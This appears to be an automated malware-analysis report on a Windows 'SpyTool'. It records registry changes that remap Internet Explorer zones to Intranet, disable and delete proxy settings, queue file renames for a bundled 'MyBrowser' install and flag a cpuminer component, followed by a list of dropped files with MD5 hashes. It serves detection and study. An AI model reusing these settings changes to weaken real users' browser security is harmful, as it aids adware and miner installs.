"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E9 DE 10 E4 FD 80 9B 01 45 0A 08 D1 05 4C 59 5D"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process encrypt.exe:1060 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "44 60 DA 48 2E 36 20 01 29 25 8F 09 F7 BD 57 B3"

The process encrypt.exe:1476 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E7 3D 4C 0F E0 AC D8 74 FC 9C 20 4D 2F 40 B6 2C"

The process encrypt.exe:1100 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "01 72 B0 F9 7C C7 F3 9E FE 0A C7 48 8A EA 59 AC"

The process encrypt.exe:1584 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8A F9 6D 5A 47 92 CC 95 F5 82 23 CB 85 FB F5 19"

The process nsx1C.tmp:1896 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "E5 31 28 B7 F5 CC BE 98 97 2D DC 89 51 BC E8 47"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\registry.dll,"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "M"

The process nsx1C.tmp:1088 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso23.tmp\registry.dll,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\InstallPath\Status]
"OperaRUnew" = "S"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 0B 0D FC 04 2B 9F AF 65 DF FD D3 C4 73 AB 07"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following registry key(s):

[HKCU\Software\InternetTurbo]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nst25.tmp:1804 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\System\CurrentControlSet\Control\Session Manager]
"PendingFileRenameOperations" = "\??\%Program Files%\MyBrowser\MyBrowser, , \??\%Program Files%\MyBrowser, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsd20.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso23.tmp\registry.dll, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nso23.tmp\, , \??\C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj29.tmp\registry.dll,"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1E 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\InstallPath\Status]
"cpuminer" = "S"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EF 11 5F 00 8D DD 9F 67 76 1C 59 9F DD 8C 61 1E"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following registry key(s):

[HKCU\Software\InternetTurbo]

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nso3D.tmp:3724 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 22 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "51 0E E1 25 3E 1F C3 9E C3 01 DF 89 6A 2B 06 62"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process nsk6.tmp:204 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "74 86 39 8C 5F 02 5F 7B B9 B9 46 94 6E 16 AB 90"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\System\CurrentControlSet\Services\NlaSvc]
"CMPK" = "-imi-tot-cpm-opw-crb-crr"

The process %original file name%.exe:1736 makes changes in the system registry.


The SpyTool creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\VOPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1A 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\NUIns]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\APPackage]
"isnw" = "7"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "94 C0 BD C9 92 5B 4B 60 B1 AC 35 F4 59 FD 75 46"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\YSPackage]
"isnw" = "7"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\ASPackage]
"isnw" = "7"

The SpyTool modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The SpyTool modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The SpyTool modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The SpyTool deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

MD5 File path
c8ce26b81e2160a03cee3fe0f4ad4463c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\3554\setup.exe
690f4b16c53bec409e4f465cfb4231a3c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\9823.exe
f02155fa3e59a8fc48a74a236b2bb42ec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd2.tmp\inetc.dll
2b7007ed0262ca02ef69d8990815cbebc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsd20.tmp\registry.dll
fce81f5d5e6baabe8eb9f87a1bb3599cc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsnD.tmp
2b7007ed0262ca02ef69d8990815cbebc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nso23.tmp\registry.dll
029aa26a0dd5ef7bd1ba1639703f8faec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsr19.tmp
cf3c49ebab2b29f65fe80ec349072d99c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temp\nsx1C.tmp
5c9336efb1faf577655bcd88a444c26bc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\50VNMNR6\wEvFLQF[1].exe
029aa26a0dd5ef7bd1ba1639703f8faec:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\7121923af824073a25b2b7e6ba0a6e0e[1].exe
67eda82fc3df3349df44916f6efe55bfc:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\BBQ8UCAH\cmmdWriter[1].exe
cf3c49ebab2b29f65fe80ec349072d99c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\Bundle_OperaRUnew[1].exe
690f4b16c53bec409e4f465cfb4231a3c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\NEQGTK15\setup[1].exe
1f71f441cb13035d10d8b6979a628ddac:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\U6SGQ9ZH\36e0f22eacad857de2cd3b76aedc24a7[1].exe
c8ce26b81e2160a03cee3fe0f4ad4463c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\chrmstp.exe
c8ce26b81e2160a03cee3fe0f4ad4463c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\Installer\setup.exe
e6b0bc04dca07169abfc4456c4671307c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\PepperFlash\pepflashplayer.dll
0bcd0698977726a660321b4fec8f4a5ec:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome.dll
6d64fd7d8a69a39ed4ddcf0cd8d26b4bc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_child.dll
72f70472e350b35290839f3e2802b4f4c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\chrome_elf.dll
c81e0c917d5db4fecd2ec3c7e2712bbfc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\d3dcompiler_46.dll
634ec1dc874c89711b94b5c279987d66c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\delegate_execute.exe
6e98034de60d2e96b4bbb148bbeabadbc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\ffmpegsumo.dll
17baa5fcf3b9206cc0395a7cc38be7acc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libegl.dll
2b8929f7edc2df8925066cb0e7067365c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libexif.dll
a25f20a5664891bc292970bd23acbf21c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\libglesv2.dll
302f011627a16ce5555e39ec53d4fbddc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\metro_driver.dll
814cb49f7706f681723ea9b5746987e4c:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\nacl64.exe
90871478e7b9765cccb884751bfafc7bc:\Program Files\MyBrowser\MyBrowser\Application\39.5.2171.95\pdf.dll
